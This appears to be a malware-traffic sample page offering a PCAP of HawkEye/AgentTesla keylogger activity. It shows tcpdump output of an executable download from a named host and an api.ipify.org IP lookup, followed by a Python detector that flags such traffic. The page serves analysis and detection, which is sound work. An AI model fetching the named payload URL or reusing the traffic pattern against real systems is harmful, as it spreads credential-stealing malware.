HawkEye AgentTesla Ransomware Keylogger Trojan Malware PCAP File Download Traffic Sample


Download Attachments

  • 1 pcap document
    Date added: February 10, 2020 12:54 am
    Added by: admin
    File size: 2 MB
    Downloads: 197

AgentTesla/HawkEye

HawkEye is often installed bundled with other malware. It is a Trojan and keylogger used to steal private information such as passwords and login credentials, and it is an advanced piece of malware with strong evasion functions.

2020-02-08 21:06:37.358933 IP 192.168.86.25.56314 > 103.21.59.28.80: Flags [P.], seq 943967658:943968182, ack 1690180958, win 16514, length 524: HTTP: GET /docs/document.exe HTTP/1.1
E..4.p@...7a..V.g.;....P8C..d..^P.@.....GET /docs/document.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=91939-
Unless-Modified-Since: Thu, 06 Feb 2020 12:13:08 GMT
If-Range: "4200037-197800-59de7322fa108"
Host: www.tashipta.com
Connection: Keep-Alive

2020-02-08 21:10:22.298098 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 1026995435:1026995552, ack 2459614608, win 64240, length 117
[non-printable TLS payload bytes omitted; readable string in the payload: api.ipify.org]

2020-02-08 21:10:22.334378 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 2921:4097, ack 117, win 29200, length 1176
[non-printable TLS payload bytes omitted; readable strings in the payload: AddTrust AB, AddTrust External TTP Network, AddTrust External CA Root, 000530104838Z..200530104838Z, GB, Greater Manchester, Salford, COMODO CA Limited, COMODO RSA Certification Authority, http://crl.usertrust.com/AddTrustExternalCARoot.crl]

2020-02-08 21:10:22.334395 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5557:5851, ack 117, win 29200, length 294
[non-printable payload bytes omitted]

2020-02-08 21:10:22.348170 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 117:251, ack 5851, win 64240, length 134
[non-printable payload bytes omitted]

2020-02-08 21:10:22.377158 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5851:5910, ack 251, win 30016, length 59
[non-printable payload bytes omitted]

2020-02-08 21:10:22.431475 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 251:352, ack 5910, win 64181, length 101
[non-printable payload bytes omitted]

2020-02-08 21:10:22.456994 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5910:6123, ack 352, win 30016, length 213
[non-printable payload bytes omitted]

2020-02-08 21:10:22.692499 IP 23.23.73.124.443 > 192.168.86.25.56315: Flags [P.], seq 5910:6123, ack 352, win 30016, length 213
[non-printable payload bytes omitted; same seq range as the previous segment, i.e. a retransmission]
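To turn a dump like the one above into something a SOC can act on, here is an added example (it is not code from this page or from the sample's author) that parses tcpdump -A style output and flags the two behaviours visible in this capture: a Windows executable fetched over plaintext HTTP with a Range header (a resumed download), and a TLS connection whose payload names a public-IP lookup service. The sample lines embedded in it are copied from the capture above, with the ellipsis characters restored to dots, a subset of the HTTP headers kept, and the api.ipify.org packet trimmed to its summary line plus the readable hostname; the watchlist entries other than api.ipify.org are an assumption for illustration, not something this capture shows.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample input constructed from the tcpdump -A dump on this page ("..." restored,
# only some HTTP headers kept, TLS packet trimmed to summary line + hostname).
SAMPLE_DUMP = """\
2020-02-08 21:06:37.358933 IP 192.168.86.25.56314 > 103.21.59.28.80: Flags [P.], seq 943967658:943968182, ack 1690180958, win 16514, length 524: HTTP: GET /docs/document.exe HTTP/1.1
E..4.p@...7a..V.g.;....P8C..d..^P.@.....GET /docs/document.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Range: bytes=91939-
Unless-Modified-Since: Thu, 06 Feb 2020 12:13:08 GMT
If-Range: "4200037-197800-59de7322fa108"
Host: www.tashipta.com

2020-02-08 21:10:22.298098 IP 192.168.86.25.56315 > 23.23.73.124.443: Flags [P.], seq 1026995435:1026995552, ack 2459614608, win 64240, length 117
.2.8.......+..............api.ipify.org.
"""

# tcpdump summary line: timestamp, "IP src.port > dst.port:", ..., "length N"
PACKET_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r".*\blength (?P<len>\d+)"
)
REQUEST_RE = re.compile(r"(GET|POST|HEAD) (\S+) HTTP/1\.[01]")
# Hostname-like printable strings in a mostly binary payload (TLS SNI is plain text).
HOSTNAME_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}")
# Assumption: illustrative watchlist; only api.ipify.org is seen in this capture.
IP_LOOKUP_SERVICES = {"api.ipify.org", "checkip.dyndns.org", "ipinfo.io"}
EXEC_SUFFIXES = (".exe", ".dll", ".scr")


@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    length: int
    payload: List[str] = field(default_factory=list)


def parse_dump(text: str) -> List[Packet]:
    """Group a tcpdump -A dump into packets: one summary line plus its payload lines."""
    packets: List[Packet] = []
    for line in text.splitlines():
        m = PACKET_RE.match(line)
        if m:
            packets.append(Packet(m["ts"], m["src"], int(m["sport"]),
                                  m["dst"], int(m["dport"]), int(m["len"])))
        elif packets and line.strip():
            packets[-1].payload.append(line)
    return packets


def http_request(pkt: Packet) -> Optional[Dict[str, str]]:
    """Method, path and lower-cased headers of an HTTP request payload, or None.
    The first payload line starts with raw IP/TCP header bytes, so the request
    line is searched for instead of being read from column 0."""
    m = REQUEST_RE.search("\n".join(pkt.payload))
    if not m:
        return None
    req = {"method": m.group(1), "path": m.group(2)}
    for line in pkt.payload[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            req[key.strip().lower()] = value.strip()
    return req


def tls_hostnames(pkt: Packet) -> List[str]:
    """Candidate hostnames in the payload (binary data can add junk candidates)."""
    found: List[str] = []
    for line in pkt.payload:
        for name in HOSTNAME_RE.findall(line):
            if name not in found:
                found.append(name)
    return found


def analyze(text: str) -> List[Dict[str, str]]:
    """Run the detections over a dump and return one finding per hit, in packet order."""
    findings: List[Dict[str, str]] = []
    for pkt in parse_dump(text):
        if pkt.dport == 80:
            req = http_request(pkt)
            if req is None:
                continue
            host = req.get("host", pkt.dst)
            if req["path"].lower().endswith(EXEC_SUFFIXES):
                findings.append({"ts": pkt.ts, "rule": "executable_over_http",
                                 "detail": f"{req['method']} http://{host}{req['path']}"})
            if "range" in req:  # partial/resumed download of the same file
                findings.append({"ts": pkt.ts, "rule": "resumed_download",
                                 "detail": f"Range: {req['range']} from {host}"})
        elif pkt.dport == 443:
            for name in tls_hostnames(pkt):
                if name in IP_LOOKUP_SERVICES:
                    findings.append({"ts": pkt.ts, "rule": "public_ip_lookup",
                                     "detail": f"TLS connection to {name} ({pkt.dst})"})
    return findings
```

Running `analyze(SAMPLE_DUMP)` yields three findings: the GET of `/docs/document.exe` from `www.tashipta.com`, the `Range: bytes=91939-` resume of that same download, and the TLS session to `api.ipify.org`. The hostname scan is deliberately loose and only fires against the watchlist, so junk strings from binary payloads do not produce findings on their own.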

Written By

admin